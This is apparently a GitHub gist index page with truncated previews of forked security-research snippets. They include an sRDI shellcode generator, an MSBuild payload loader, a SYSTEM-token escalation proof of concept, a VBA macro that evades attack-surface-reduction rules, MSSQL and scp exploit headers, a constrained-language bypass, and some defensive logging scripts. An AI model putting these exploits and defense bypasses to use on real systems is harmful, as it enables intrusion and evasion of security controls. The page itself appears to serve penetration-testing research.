sasqwatch’s gists

sasqwatch / ShellcodeRDI.go

Created February 13, 2019 09:27 — forked from leoloobeek/ShellcodeRDI.go

Go implementation of https://github.com/monoxgas/sRDI/

	package main

	/*
	*
	* This is just a Go implementation of https://github.com/monoxgas/sRDI/
	* Useful if you're trying to generate shellcode for reflective DLL
	* injection in Go, otherwise probably not much use :)
	*
	* The project, shellcode, most comments within this project
	* are all from the original project by @SilentBreakSec's Nick Landers (@monoxgas)

sasqwatch / msBuildDemo.xml

Created January 31, 2019 23:52 — forked from G0ldenGunSec/msBuildDemo.xml

MSBuild payload used to execute a remotely-hosted .net assembly

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="DemoClass">
	<ClassExample />
	</Target>
	<UsingTask
	TaskName="ClassExample"
	TaskFactory="CodeTaskFactory"
	AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
	<Code Type="Class" Language="cs">

sasqwatch / process_image_logging.ps1

Created January 31, 2019 20:35 — forked from mattifestation/process_image_logging.ps1

	# These values were obtained from: logman query providers Microsoft-Windows-Kernel-Process
	$WINEVENT_KEYWORD_PROCESS = 0x10
	$WINEVENT_KEYWORD_IMAGE = 0x40

	# Normally when you enable an analytic log, all keywords are logged which can be veeeeerrrrryy noisy.
	# I'm going to limit collection to only image and process event
	$KernelProcessLog = New-Object -TypeName System.Diagnostics.Eventing.Reader.EventLogConfiguration -ArgumentList 'Microsoft-Windows-Kernel-Process/Analytic'
	$KernelProcessLog.ProviderKeywords = ($WINEVENT_KEYWORD_PROCESS -bor $WINEVENT_KEYWORD_IMAGE)
	$KernelProcessLog.ProviderLevel = 0xFF
	$KernelProcessLog.IsEnabled = $true

sasqwatch / getsystem_parent.cpp

Created January 30, 2019 22:08 — forked from xpn/getsystem_parent.cpp

A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS

	#include "stdafx.h"

	BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
	TOKEN_PRIVILEGES tp;
	LUID luid;
	TOKEN_PRIVILEGES tpPrevious;
	DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);

	if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;

sasqwatch / ASR Rules Bypass.vba

Created January 30, 2019 21:35 — forked from infosecn1nja/ASR Rules Bypass.vba

ASR rules bypass creating child processes

	' ASR rules bypass creating child processes
	' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
	' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
	' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

	Sub ASR_blocked()
	Dim WSHShell As Object
	Set WSHShell = CreateObject("Wscript.Shell")
	WSHShell.Run "cmd.exe"
	End Sub

sasqwatch / bad_sequel.py

Created January 29, 2019 00:47 — forked from 3xocyte/bad_sequel.py

PoC MSSQL RCE exploit using Resource-Based Constrained Delegation

	#!/usr/bin/env python

	# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
	# this is a rough PoC

	# requirements for RCE:
	# - the attacker needs to either have or create an object with a service principal name
	# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
	# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
	# - NTLM has to be in use

sasqwatch / sshtranger_things.py

Created January 23, 2019 19:20 — forked from mehaase/sshtranger_things.py

SSHtranger Things Exploit POC

	'''
	Title: SSHtranger Things
	Author: Mark E. Haase <[email protected]>
	Homepage: https://www.hyperiongray.com
	Date: 2019-01-17
	CVE: CVE-2019-6111, CVE-2019-6110
	Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt
	Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1

	We have nicknamed this "SSHtranger Things" because the bug is so old it could be

sasqwatch / RunscripthelperBypass.ps1

Created January 22, 2019 18:41 — forked from mattifestation/RunscripthelperBypass.ps1

PowerShell weaponization for the runscripthelper.exe constrained language mode bypass

	function Invoke-RunScriptHelperExpression {
	<#
	.SYNOPSIS

	Executes PowerShell code in full language mode in the context of runscripthelper.exe.

	.DESCRIPTION

	Invoke-RunScriptHelperExpression executes PowerShell code in the context of runscripthelper.exe - a Windows-signed PowerShell host application which appears to be used for telemetry collection purposes. The PowerShell code supplied will run in FullLanguage mode and bypass constrained language mode.

sasqwatch / ExtractDriversFromAuditLogs.ps1

Created January 22, 2019 18:41 — forked from mattifestation/ExtractDriversFromAuditLogs.ps1

	# Create a temp dir in which to copy the drivers to whitelist
	mkdir ScanMe

	Get-WinEvent -LogName 'Microsoft-Windows-CodeIntegrity/Operational' -FilterXPath '*[System[EventID=3076]]' \| ForEach-Object {
	$DriverPath = $_.Properties[1].Value

	# Normalize the paths
	switch -Wildcard ($DriverPath) {
	'\Device\HarddiskVolume4\*' { $DriverPath = "C:\$($DriverPath.Replace('\Device\HarddiskVolume4\', ''))" }
	'System32*' { $DriverPath = "C:\Windows\$DriverPath" }

sasqwatch / CILStreamObfuscation.ps1

Created January 22, 2019 18:40 — forked from mattifestation/CILStreamObfuscation.ps1

	${🤷} = New-Object Reflection.Emit.DynamicMethod('💩', [UInt32], @([UInt32], [UInt32]))
	${🤔} = ${🤷}.GetILGenerator()
	@(@(2, 275120805),@(3, 275120805),@(88, -261739867),@(42, 23440101)) \| % {
	${🤔}.Emit([Activator]::CreateInstance([System.Reflection.Emit.OpCode], [Reflection.BindingFlags] 'NonPublic, Instance', $null, @(($_[0] -as [System.Reflection.Emit.OpCode].Assembly.GetType('System.Reflection.Emit.OpCodeValues')), $_[1]), $null))
	}
	${💩} = ${🤷}.CreateDelegate([Func``3[UInt32, UInt32, UInt32]])
	${💩}.Invoke(2,3)